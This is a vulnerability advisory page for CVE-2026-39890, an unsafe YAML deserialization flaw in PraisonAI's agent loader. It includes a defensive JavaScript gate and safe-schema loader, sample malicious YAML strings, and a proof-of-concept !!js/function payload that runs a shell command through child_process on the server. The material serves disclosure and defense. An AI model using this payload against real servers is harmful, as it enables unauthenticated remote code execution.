Security Vulnerability Report
CVE-2026-39890 CVSS 9.8 CRITICAL

CVE-2026-39890

Published: 2026-04-08 21:17:01
Last Modified: 2026-04-15 17:56:14

Description

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115.
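As an added example (not code from the advisory and not PraisonAI's own loader or its 4.5.115 fix), the JavaScript below shows the two layers an agent-file loader needs: a gate that rejects every spelling of js-yaml's JavaScript tags in an uploaded document, and a parse call that uses a schema with no JavaScript types. The sample agent documents, their field names and the function names (findJsTags, loadAgentYamlSafely) are assumptions for illustration. It goes beyond the description's !!js/function case by also covering the verbatim tag and the %TAG-directive spellings that an attacker would try against a naive "!!js/" filter.

```javascript
// Added example (not PraisonAI code, not the project's fix): a pre-parse gate
// for uploaded agent definitions that rejects every spelling of js-yaml's
// JavaScript tags, followed by a loader that parses with a schema containing
// no JavaScript types. The schema is the real fix; the gate is defense in
// depth and a convenient place to log an attempted upload.

// Constructed sample in the shape of the advisory's PoC: a !!js/function node
// inside an otherwise ordinary agent definition. The field names are assumed.
const MALICIOUS_AGENT_YAML = `
name: helper
instructions: !!js/function |
  function () { return "pwned"; }
`;

// Constructed sample: the same tag written in verbatim form. js-yaml resolves
// !<tag:yaml.org,2002:js/function> to the same type as !!js/function, so a
// check that only looks for the "!!js/" shorthand misses it.
const VERBATIM_TAG_YAML = `
name: helper
instructions: !<tag:yaml.org,2002:js/function> |
  function () { return "pwned"; }
`;

// Constructed sample: a %TAG directive binds the handle "!j!" to the js/
// namespace, so "!j!function" is a third spelling of the same tag. Rebinding
// "!!" itself is possible too, which would turn "!!function" into js/function.
const TAG_DIRECTIVE_YAML = `%TAG !j! tag:yaml.org,2002:js/
---
name: helper
instructions: !j!function |
  function () { return "pwned"; }
`;

// Constructed sample: a benign definition using only core-schema tags.
const BENIGN_AGENT_YAML = `
name: helper
role: Summarise documents
tools:
  - search
  - !!str 42   # explicit core tag, harmless
`;

// Scans the raw text line by line and returns every finding; an empty array
// means the document carries no JavaScript tag in any of the three spellings.
function findJsTags(yamlText) {
  const findings = [];
  yamlText.split(/\r?\n/).forEach((line, i) => {
    const lineNo = i + 1;
    // Agent definitions have no legitimate use for %TAG, and any directive
    // can alias the js/ namespace, so reject all of them rather than parse them.
    if (/^%TAG\b/.test(line)) {
      findings.push({ line: lineNo, kind: 'tag-directive', text: line.trim() });
    }
    // Shorthand form: !!js/function, !!js/regexp, !!js/undefined
    for (const m of line.matchAll(/!!js\/[A-Za-z]+/g)) {
      findings.push({ line: lineNo, kind: 'js-tag', text: m[0] });
    }
    // Verbatim form: !<tag:yaml.org,2002:js/function>
    for (const m of line.matchAll(/!<tag:yaml\.org,2002:js\/[^>]*>/g)) {
      findings.push({ line: lineNo, kind: 'js-tag', text: m[0] });
    }
  });
  return findings;
}

// The loader an upload endpoint should call. The gate runs first; then the
// document is parsed with CORE_SCHEMA, which exists in both js-yaml 3.x and
// 4.x and contains no JavaScript types. (In 3.x the default for load() was the
// full schema with js types; in 4.x load() is already safe, but naming the
// schema keeps that explicit.) js-yaml is assumed to be installed; it is
// required lazily so the gate above can be exercised without it.
function loadAgentYamlSafely(yamlText) {
  const findings = findJsTags(yamlText);
  if (findings.length > 0) {
    const detail = findings
      .map((f) => `${f.kind} "${f.text}" at line ${f.line}`)
      .join('; ');
    throw new Error('rejected agent definition: ' + detail);
  }
  const yaml = require('js-yaml');
  return yaml.load(yamlText, { schema: yaml.CORE_SCHEMA });
}
```

Run the gate on the decoded text the parser will see, not on the raw upload bytes, so that a transcoding step cannot make the two disagree. The one line that actually closes the vulnerability is the schema argument to yaml.load; the scanner only buys an audit trail and a rejection before the parser touches the document.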

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.115

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# Malicious YAML payload for CVE-2026-39890
# This payload uses !!js/function to execute arbitrary code on the server.
# The tag sits on a block scalar; a literal block (|) keeps each line of the
# function body, including the // comments, on its own line so the source
# still parses as JavaScript. With a folded block (>) the body lines must be
# indented further than the first line, otherwise folding joins them and the
# first // comment swallows the rest of the function.
# js-yaml constructs the Function when the document is parsed; its body runs
# when the application invokes the loaded value, which depends on what the
# vulnerable loader does with the object and is not detailed in the advisory.
!!js/function |
  function (obj) {
    // PoC: Execute a simple command (e.g., creating a file or reverse shell)
    // process.mainModule is deprecated and is undefined when the host runs as
    // an ES module; in that case this line throws instead of executing.
    var require = process.mainModule.require;
    var child_process = require('child_process');
    // Example: Execute 'id' command
    // In a real attack, this would be a reverse shell payload
    child_process.exec('id', function (error, stdout, stderr) {
      console.log('Output: ' + stdout);
    });
    return "Pwned by CVE-2026-39890";
  }

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-39890",
    "sourceIdentifier": "security-advisories@github.com",
    "published": "2026-04-08T21:17:01.267",
    "lastModified": "2026-04-15T17:56:13.590",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. This vulnerability is fixed in 4.5.115."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security-advisories@github.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security-advisories@github.com",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-502" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "4.5.114",
                "matchCriteriaId": "B0754891-B47D-441D-A0E6-710A49389AE4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2",
        "source": "security-advisories@github.com",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-32vr-5gcf-3pw2",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}